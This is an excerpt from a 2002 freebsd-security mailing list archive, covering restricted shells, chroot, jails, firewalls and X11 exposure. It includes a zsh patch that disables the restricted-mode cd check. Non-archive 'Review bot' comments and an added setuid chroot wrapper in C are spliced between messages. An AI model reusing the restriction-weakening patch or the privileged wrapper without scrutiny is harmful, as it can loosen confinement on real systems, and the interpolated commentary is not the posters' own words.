In-Reply-To: <20020508171717.A37592@mail.slc.edu>
Cc: security@freebsd.org
Message-Id: <200205081608.21273.dowen@pstis.com>

On May 8, 2002 03:17 pm, you wrote:

Nope. rbash disables "cd", remember? :) I need to be able to browse subdirectories.

> if you don't have any luck finding a shell with chrootability, you could
> easily write a simple setuid wrapper to chroot() and then execute rbash,
> where rbash is located within the chrooted file hierarchy.
> -Anthony.
>
> On Wed, May 08, 2002 at 02:43:51PM -0600, Dalin S. Owen wrote:
> > On May 8, 2002 10:31 am, Justin King wrote:
> >
> > Actually.. I am looking for the almost same answer... what about a
> > chroot-ed shell? ie. they can "cd" forwards but not back beyond my
> > designated "/"... and I quote (from bash's manpage):
> >
> > "When a command that is found to be a shell script is executed
> > (see COMMAND EXECUTION above), rbash turns off any
> > restrictions in the shell spawned to execute the script."
> >
> > I don't want that. I want all other processes to be chrooted too. By
> > now some of you are thinking "jail"... A jail won't cut it, because you
> > can't use quotas in a jail.
> >
> > Does anyone know to do this with bash, or any other shell? I recall
> > someone talking about a shell that could do all of the above.
> >
> > Thanks!:)
> >
> > FreeBSD Rox, BTW!
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:16:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 7C30A37B409 for ; Wed, 8 May 2002 15:15:43 -0700 (PDT) Received: (qmail 3888 invoked from network); 8 May 2002 22:15:41 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 8 May 2002 22:15:41 -0000 Content-Type: text/plain; charset="iso-8859-1" 
From: "Dalin S. Owen"
Reply-To: dowen@pstis.com
Organization: Nexus XI Corp.
To: "Nielsen"
Subject: Re: Accounts with Restricted privileges
Date: Wed, 8 May 2002 16:11:31 -0600
References: <200205081443.51457.dowen@pstis.com>
Cc: security@freebsd.org
Message-Id: <200205081611.31348.dowen@pstis.com>

On December 31, 1969 04:59 pm, you wrote:

That is not good on a system with 1000's of users... and I have different users and UID's for inside my jails and outside.... Having a separate quota file + system for jails would be real nice... maybe when I have time I will write it.

> Hmmm, I've used quotas in a jail. Just set the quotas on the host system
> with the same user ids. You can't "quota" the root user in a jail, but
> other users can be done quite nicely. Besides if you really want to give a
> quota to directory tree (not a user) you probably should be using vn
> devices.
>
> > I don't want that. I want all other processes to be chrooted too. By
> > now some of you are thinking "jail"... A jail won't cut it, because you
> > can't use quotas in a jail.
> > all the best, > > Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:25:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 00B6F37B400; Wed, 8 May 2002 15:25:52 -0700 (PDT) Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g48MPo3g023731; Thu, 9 May 2002 08:25:50 +1000 (EST) Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g48MPnML023729; Thu, 9 May 2002 08:25:49 +1000 (EST) 
From: Darren Reed Message-Id: <200205082225.g48MPnML023729@cairo.anu.edu.au> Subject: Re: ipf vs. ipfw To: wollman@khavrinen.lcs.mit.edu (Garrett Wollman) Date: Thu, 9 May 2002 08:25:49 +1000 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG In-Reply-To: <200205081556.g48FuY0q084024@khavrinen.lcs.mit.edu> from "Garrett Wollman" at May 08, 2002 11:56:34 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Garrett Wollman, sie said: > > < said: > > > ipfw does share its roots with the linux ipfw but linux long ago dropped > > its one and the freebsd one is now much different. > > It is possible that the old Lignux `ipfw' was based on FreeBSD's; not > the other way around. You might be right about that as I believe there was attribution in Linux to FreeBSD. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:34: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 457A437B400; Wed, 8 May 2002 15:34:01 -0700 (PDT) Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g48MXv3g024458; Thu, 9 May 2002 08:33:57 +1000 (EST) Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g48MXtIK024453; Thu, 9 May 2002 08:33:55 +1000 (EST) 
From: Darren Reed
Message-Id: <200205082233.g48MXtIK024453@cairo.anu.edu.au>
Subject: Re: ipf vs. ipfw
To: tal@lumeta.com (Tom Limoncelli)
Date: Thu, 9 May 2002 08:33:55 +1000 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG
In-Reply-To: <3CD95E0F.A3E7398C@lumeta.com> from "Tom Limoncelli" at May 08, 2002 01:19:11 PM

In some mail from Tom Limoncelli, sie said:
>
> Thanks to everyone that answered my questions. As in true Usenet
> tradition, if you want the full story, post a message with a lot of
> incorrect statements. I got much better results than the carefully thought
> out queries that I had sent to various people. :-)
>
> I've updated my page
> http://whatexit.org/tal/mywritings/freefilters.html

The line entry for pf is wrong. It is definitely not a superset of IPFilter or ipfw or any of the other free packet filtering systems. It should simply say pf includes the listed features.

You also do not mention SunScreen. Version 3.1(Lite) came with Solaris8, 3.2 will be bundled with Solaris9 (don't know if this is the Lite version or not). Don't know if anyone actually uses it, either.

Darren

From owner-freebsd-security Wed May 8 15:55:13 2002
Date: Wed, 8 May 2002 15:55:09 -0700
From: Kris Kennaway To: Mark Hartley Cc: freebsd-security@freebsd.org Subject: Re: support for RELENG_4_4 Message-ID: <20020508155509.E92543@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NtwzykIc2mflq5ck" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from mark@work.drapple.com on Wed, May 08, 2002 at 01:47:58PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, May 08, 2002 at 01:47:58PM -0700, Mark Hartley wrote: > 1. Is the 4_4 branch about to lose its status as a "receives all security > fixes" branch? I believe it's still the intention. It's been the official policy for many years (documented on the security webpage), although in the past (during my time as security officer) we did the extra work of extending support for some older branches beyond their official lifetime. I considered that work to be purely an additional courtesy to the users of older branches though, and not something we were bound by policy to continue. 
Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 17:58:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f136.law14.hotmail.com [64.4.21.136]) by hub.freebsd.org (Postfix) with ESMTP id D0F9437B423 for ; Wed, 8 May 2002 17:58:16 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 8 May 2002 17:58:16 -0700 Received: from 209.124.231.186 by lw14fd.law14.hotmail.msn.com with HTTP; Thu, 09 May 2002 00:58:15 GMT X-Originating-IP: [209.124.231.186] 
From: "William J. Borskey" To: security@freebsd.org Subject: ethernet firewall Date: Wed, 08 May 2002 17:58:15 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 May 2002 00:58:16.0117 (UTC) FILETIME=[9A1D9E50:01C1F6F4] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org can i use ethfw and ipfw at the same time? if i make a rule in ethfw to only allow access to port 139 from a certain ethernet address, do i also have to allow it in ipfw? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 18:29:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (dav38.law15.hotmail.com [64.4.22.95]) by hub.freebsd.org (Postfix) with ESMTP id 0B63F37B40E for ; Wed, 8 May 2002 18:29:20 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 8 May 2002 18:29:19 -0700 X-Originating-IP: [24.217.152.66] 
From: "aman netsec" To: References: Subject: Re: ethernet firewall Date: Wed, 8 May 2002 20:25:38 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 09 May 2002 01:29:19.0976 (UTC) FILETIME=[F10FEE80:01C1F6F8] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I haven't but, I think you can have both at the same time - just needs extra care!!! Do you mean that you are denying everything else when u say "only allow access to port 139". You will indeed need to allow it in ipfw, because it will block it from getting to the upper layers on the stack. This is net-bios and won't do any good down below in the stack. Hope it helps Aman ----- Original Message ----- From: "William J. Borskey" To: Sent: Wednesday, May 08, 2002 5:58 PM Subject: ethernet firewall > > > can i use ethfw and ipfw at the same time? if i make a rule in ethfw to only > allow access to port 139 from a certain ethernet address, do i also have to > allow it in ipfw? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 18:55: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f42.pav0.hotmail.com [64.4.32.226]) by hub.freebsd.org (Postfix) with ESMTP id 0736237B407 for ; Wed, 8 May 2002 18:55:04 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 8 May 2002 18:55:03 -0700 Received: from 24.217.8.73 by pv0fd.pav0.hotmail.msn.com with HTTP; Thu, 09 May 2002 01:55:03 GMT X-Originating-IP: [24.217.8.73] 
From: "Chest Rockwell" To: FreeBSD-security@FreeBSD.org Subject: 2 questions. permission and kde. Date: Wed, 08 May 2002 20:55:03 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 May 2002 01:55:03.0855 (UTC) FILETIME=[89492BF0:01C1F6FC] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i have a remote webserver where i cant leave my home folder. ie /usr/home/marley, i'm not able to get out of the marley dir. is that just a permission setting, or a program or something else? how can i set it up on my machine so that someone would be set to 1 dir and not able to move out of it? the 2nd q is: i've setup my freebsd 4.5 machine and didn't install xwindows. is there any security risks in doing so? if i go through /stand/sysinstall, what would i have to setup to be able to run xwindows using kde. there is a whole list and i'm guessing that i only need a couple of them. thx in advance, marley To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 19:20:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from imation.homenetweb.com (noc-p5-3-ky-4.homenetweb.com [216.7.67.90]) by hub.freebsd.org (Postfix) with ESMTP id 50DEC37B411 for ; Wed, 8 May 2002 19:20:18 -0700 (PDT) Received: from noc2 (d2i-dialin-130.kl.terranova.net [216.89.230.130]) by imation.homenetweb.com (8.12.3/8.12.3) with SMTP id g492KBf9001049; Wed, 8 May 2002 22:20:12 -0400 (EDT) Message-ID: <000701c1f6ff$8fd85f60$0101a8c0@noc2> 
From: "Richard Ward" To: "Chest Rockwell" , References: Subject: Re: 2 questions. permission and kde. Date: Wed, 8 May 2002 22:16:32 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > i have a remote webserver where i cant leave my home folder. ie > /usr/home/marley, i'm not able to get out of the marley dir. is that just a > permission setting, or a program or something else? how can i set it up on > my machine so that someone would be set to 1 dir and not able to move out of > it? jail(2). -- Richard Ward, GM Home Net Web, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 19:25:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from imation.homenetweb.com (noc-p5-3-ky-4.homenetweb.com [216.7.67.90]) by hub.freebsd.org (Postfix) with ESMTP id 0838037B403 for ; Wed, 8 May 2002 19:25:25 -0700 (PDT) Received: from noc2 (d2i-dialin-130.kl.terranova.net [216.89.230.130]) by imation.homenetweb.com (8.12.3/8.12.3) with SMTP id g492PJf9001072; Wed, 8 May 2002 22:25:20 -0400 (EDT) Message-ID: <001301c1f700$47474bc0$0101a8c0@noc2> 
From: "Richard Ward" To: "Richard Ward" , "Chest Rockwell" , References: <000701c1f6ff$8fd85f60$0101a8c0@noc2> Subject: Re: 2 questions. permission and kde. Date: Wed, 8 May 2002 22:21:47 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry. I misunderstood the question. Try chroot(2) instead. -- Richard Ward, GM Home Net Web, Inc. ----- Original Message ----- 
From: Richard Ward To: Chest Rockwell ; Sent: Wednesday, May 08, 2002 10:16 PM Subject: Re: 2 questions. permission and kde.
> > i have a remote webserver where i cant leave my home folder. ie
> > /usr/home/marley, i'm not able to get out of the marley dir. is that just a
> > permission setting, or a program or something else? how can i set it up on
> > my machine so that someone would be set to 1 dir and not able to move out of
> > it?
>
> jail(2).
> --
> Richard Ward, GM
> Home Net Web, Inc.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 19:58:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id C2E5937B400 for ; Wed, 8 May 2002 19:58:09 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g492w4cI062491 for ; Wed, 8 May 2002 22:58:10 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Wed, 8 May 2002 22:57:59 -0400 (EDT) 
From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: 2 questions. permission and kde. In-Reply-To: Message-ID: <20020508224922.S62456-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 8 May 2002, Chest Rockwell wrote: > i have a remote webserver where i cant leave my home folder. ie > /usr/home/marley, i'm not able to get out of the marley dir. is that just a > permission setting, or a program or something else? how can i set it up on > my machine so that someone would be set to 1 dir and not able to move out of > it? You're not able to browse out of the marley dir, or you're not able to get a shell and cd out of ~marley? If the former, it's trivial to set that up: add the following snippet to httpd.conf, and then chmod o-rwx on /usr/home: # # UserDir: The name of the directory that is appended onto a user's home # directory if a ~user request is received. # UserDir public_html AllowOverride none Options IncludesNoExec Order allow,deny Allow from all Order deny,allow Deny from all That may be a little more restrictive than you need, or not quite restrictive enough. Directory browsing is turned off in this example. > the 2nd q is: i've setup my freebsd 4.5 machine and didn't install xwindows. > is there any security risks in doing so? if i go through > /stand/sysinstall, what would i have to setup to be able to run xwindows > using kde. there is a whole list and i'm guessing that i only need a couple > of them. Block ports 6000-6063 on your external interface and you should be OK. Install the Xwrapper port so that you don't have to run your X server as root. Sure, there can be security risks if you have malicious users on your LAN who know what they're doing, or if you share the machine with same. 
If this is your home machine, no worries unless you don't trust your wife or kids (but still block those ports at the external interface). In the office, I typically only had one NIC, and I blocked X traffic on the NIC, but allowed it on the loopback device. When I needed to display remote applications back to my display, I tunnelled X through ssh ('ssh -X hostname; xterm -display mybox:0') after setting up xauth correctly. To set up KDE, first set up XFree86-4. It's easiest just to build the metaport: cd /usr/ports/x11/XFree86-4; make install clean Then cd /usr/ports/x11/kde3; make install clean It'll take awhile. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net Turning coffee into software since 1990. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 20:22:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by hub.freebsd.org (Postfix) with ESMTP id 816BE37B403 for ; Wed, 8 May 2002 20:22:52 -0700 (PDT) Received: (from anthony@localhost) by slc.edu (8.11.6/8.11.6) id g493P8R64852; Wed, 8 May 2002 23:25:08 -0400 (EDT) (envelope-from anthony) Date: Wed, 8 May 2002 23:25:07 -0400 
From: Anthony Schneider To: "Dalin S. Owen" Cc: security@freebsd.org Subject: Re: Accounts with Restricted privileges Message-ID: <20020508232507.B48952@mail.slc.edu> References: <200205081443.51457.dowen@pstis.com> <20020508171717.A37592@mail.slc.edu> <200205081608.21273.dowen@pstis.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dkEUBIird37B8yKS" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200205081608.21273.dowen@pstis.com>; from dowen@pstis.com on Wed, May 08, 2002 at 04:08:21PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ah, my bad. i'll try to read better next time. :) so what you really want is rbash without the 'cd' limitation, but also chrooted? I have here a patch i just sorta whipped up (read: crude and hardly tested, but seems to work) which allows the cd builtin to be executed. so, if you are in a chrooted environment, cd should work, and all of the rest of the restrictions should apply that come along with using restricted zsh (zsh, in case you don't know, is IMStubbornlyHO, a very nice shell, with almost, if not exactly, the same syntax features as bash, including restriction by copying zsh to rzsh). Again, this is very untested, but you should be able to apply this to builtin.c in the Src/ directory of zsh-4.0.4. I'll email zsh-workers, and see if maybe they'd consider making compilation of particular environment restrictions configurable on a per-restriction basis. Hope this helps. -Anthony. On Wed, May 08, 2002 at 04:08:21PM -0600, Dalin S. 
Owen wrote:
> On May 8, 2002 03:17 pm, you wrote:
>
> Nope. rbash disables "cd", remember? :) I need to be able to browse
> subdirectories.
>
> > if you don't have any luck finding a shell with chrootability, you could
> > easily write a simple setuid wrapper to chroot() and then execute rbash,
> > where rbash is located within the chrooted file hierarchy.
> > -Anthony.
> >
> > On Wed, May 08, 2002 at 02:43:51PM -0600, Dalin S. Owen wrote:
> > > On May 8, 2002 10:31 am, Justin King wrote:
> > >
> > > Actually.. I am looking for the almost same answer... what about a
> > > chroot-ed shell? ie. they can "cd" forwards but not back beyond my
> > > designated "/"... and I quote (from bash's manpage):
> > >
> > > "When a command that is found to be a shell script is executed
> > > (see COMMAND EXECUTION above), rbash turns off any
> > > restrictions in the shell spawned to execute the script."
> > >
> > > I don't want that. I want all other processes to be chrooted too. By
> > > now some of you are thinking "jail"... A jail won't cut it, because you
> > > can't use quotas in a jail.
> > >
> > > Does anyone know to do this with bash, or any other shell? I recall
> > > someone talking about a shell that could do all of the above.
> > >
> > > Thanks!:)
> > >
> > > FreeBSD Rox, BTW!
-----------------------------------------------
PGP key at: http://www.keyserver.net/ http://www.anthonydotcom.com/gpgkey/key.txt
Home: http://www.anthonydotcom.com
-----------------------------------------------
--FkmkrVfFsRoUs1wW Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="restr_cd.path" Content-Transfer-Encoding: quoted-printable --- builtin.c Wed May 8 23:22:27 2002 +++ builtin.c.orig Wed May 8 23:12:24 2002 
@@ -685,14 +685,10 @@ LinkNode dir; struct stat st1, st2; =20 - /* -- added 5.08.02, Anthony Schneider; allow cd in restricted mode - so rzsh may run slightly less restricted in a chroot()'ed - environment. if (isset(RESTRICTED)) { zwarnnam(nam, "restricted", NULL, 0); return 1; } - */ doprintdir =3D (doprintdir =3D=3D -1); =20 for (; *argv && **argv =3D=3D '-'; argv++) {
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 20:34:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by hub.freebsd.org (Postfix) with ESMTP id C34C937B400 for ; Wed, 8 May 2002 20:34:36 -0700 (PDT) Received: (from anthony@localhost) by slc.edu (8.11.6/8.11.6) id g493arW65688; Wed, 8 May 2002 23:36:53 -0400 (EDT) (envelope-from anthony) Date: Wed, 8 May 2002 23:36:53 -0400 
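Review bot: The file headers of this diff are in the wrong order (`--- builtin.c` / `+++ builtin.c.orig`), so in the -685,14 +685,10 hunk the four comment lines around `if (isset(RESTRICTED))` are marked as removals rather than additions. As posted, the hunk describes going from the modified file back to the original, which is the opposite of what the message says it does. Regenerate it with the pristine file first, as in `diff -u builtin.c.orig builtin.c`, so it applies cleanly to an unmodified zsh-4.0.4 tree.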
From: Anthony Schneider To: "Dalin S. Owen" Cc: security@FreeBSD.ORG Subject: Re: Accounts with Restricted privileges Message-ID: <20020508233653.A65507@mail.slc.edu> References: <200205081443.51457.dowen@pstis.com> <20020508171717.A37592@mail.slc.edu> <200205081608.21273.dowen@pstis.com> <20020508232507.B48952@mail.slc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="cmJC7u66zC7hs+87" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020508232507.B48952@mail.slc.edu>; from aschneid@mail.slc.edu on Wed, May 08, 2002 at 11:25:07PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --cmJC7u66zC7hs+87 Content-Type: multipart/mixed; boundary="HlL+5n6rz5pIUxbD" Content-Disposition: inline --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline wow, that patch was backwards. OOPS! -Anthony. ----------------------------------------------- PGP key at: http://www.keyserver.net/ http://www.anthonydotcom.com/gpgkey/key.txt Home: http://www.anthonydotcom.com ----------------------------------------------- --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="restr_cd.path" Content-Transfer-Encoding: quoted-printable --- builtin.c.orig Wed May 8 23:29:29 2002 +++ builtin.c Wed May 8 23:22:27 2002 
@@ -685,10 +685,14 @@ LinkNode dir; struct stat st1, st2; =20 + /* -- added 5.08.02, Anthony Schneider; allow cd in restricted mode + so rzsh may run slightly less restricted in a chroot()'ed + environment. if (isset(RESTRICTED)) { zwarnnam(nam, "restricted", NULL, 0); return 1; } + */ doprintdir =3D (doprintdir =3D=3D -1); =20 for (; *argv && **argv =3D=3D '-'; argv++) {
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 8:41:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id CD26A37B404 for ; Thu, 9 May 2002 08:41:02 -0700 (PDT) Received: from pen.centtech.com (pen.centtech.com [10.177.178.33]) by prox.centtech.com (8.11.6/8.11.6) with ESMTP id g49Ff1714824 for ; Thu, 9 May 2002 10:41:01 -0500 (CDT) Received: from centtech.com (proton.centtech.com [10.177.173.77]) by pen.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g49Ff1P25477 for ; Thu, 9 May 2002 10:41:01 -0500 (CDT) Message-ID: <3CDA988D.34E2148C@centtech.com> Date: Thu, 09 May 2002 10:41:01 -0500 
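Review bot: Wrapping the `if (isset(RESTRICTED))` check in a comment in this hunk removes the cd restriction from every restricted zsh built from the tree, not only from one that is started inside a chroot, so the confinement then rests entirely on the chroot being set up correctly. The block opened at `/* -- added 5.08.02` also ends at the first `*/` it meets, which will silently re-enable part of the check if a comment is ever added inside the disabled lines. Consider guarding the check with a preprocessor conditional (a build-time define with a name of your choosing) so the stock behaviour stays the default, and keep the explanatory text in its own comment above it.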
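The setuid wrapper suggested earlier in this thread (chroot(), then execute a restricted shell that lives inside the chrooted hierarchy), written out as an added example; it is not code from any poster or from zsh or bash. JAIL_DIR and JAIL_SHELL are assumed paths, and the binary is assumed to be installed setuid root so that the real uid is the invoking user.

```c
#define _DEFAULT_SOURCE            /* exposes chroot()/setgroups() on glibc */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define JAIL_DIR   "/usr/jail/shell"   /* assumption: prepared chroot tree  */
#define JAIL_SHELL "/bin/rzsh"         /* assumption: path inside that tree */

/* Return 1 if `path` is a real directory (not a symlink), owned by `owner`
 * and not writable by group or other; otherwise 0. A jail root that the
 * confined user can write to lets them replace what the shell will run. */
int jail_dir_is_safe(const char *path, uid_t owner)
{
    struct stat st;

    if (lstat(path, &st) != 0)
        return 0;
    if (!S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != owner)
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;
    return 1;
}

/* chroot into `dir`, then permanently drop to uid/gid.
 * Returns 0 on success, -1 on any failure (errno set). */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    /* A root process can leave a chroot, so never confine uid/gid 0. */
    if (uid == 0 || gid == 0) {
        errno = EINVAL;
        return -1;
    }
    if (!jail_dir_is_safe(dir, 0)) {
        errno = EPERM;
        return -1;
    }
    /* chdir first, chroot("."), then chdir("/"): the working directory
     * must end up inside the new root or it remains a way out. */
    if (chdir(dir) != 0 || chroot(".") != 0 || chdir("/") != 0)
        return -1;

    /* Drop supplementary groups, then gid, then uid. Order matters:
     * after setuid() the process may no longer change its groups. */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;

    /* Verify the drop cannot be undone before handing over control. */
    if (setuid(0) == 0 || getuid() != uid || geteuid() != uid) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Real ids identify the invoking user when installed setuid root. */
    uid_t uid = getuid();
    gid_t gid = getgid();
    char *const argv[] = { "rzsh", NULL };
    /* Fixed, minimal environment: nothing inherited from the caller. */
    char *const envp[] = { "PATH=/bin", "HOME=/", NULL };

    if (enter_jail(JAIL_DIR, uid, gid) != 0) {
        perror("enter_jail");
        return 1;
    }
    /* Every process the shell starts inherits the chroot. */
    execve(JAIL_SHELL, argv, envp);
    perror("execve");
    return 1;
}
```
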
From: Eric Anderson Reply-To: anderson@centtech.com X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: ipnat and bimapping Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org
I'm setting up a NAT gateway/firewall. It has three interfaces on it (one to the big bad net, one to the protected net, and one to a DMZ kind of net). Basically, I'm currently using the first two ports (big bad net, and protected net), but I'd like to enable that third net, without stabbing myself and creating security holes, but allowing a single machine to be "wide open" behind the gateway.

So, here's what my setup looks like:

             Internet
                |
                |
         [24.24.24.1/32]
         Nat/Gateway box
     [10.10.20.1, 10.10.10.1]
               /\
              /  \
             /    \
         wide      [protected net, 10.10.10.0/24]
         open
       box here
    [10.10.20.2/32]

Would bimap'ing the 24.24.24.1/32 address to 10.10.20.2/32 work? Or would that screw up my nat'ing of the 10.10.10.0/24 net? I need all ports NOT nat'ed to 10.10.10.0/24 to go to 10.10.20.2/32. Am I asking for trouble on the protected net, or is this safe? Is bimap the right thing to use?

How big is the gun that I am about to use to shoot myself in the foot? 
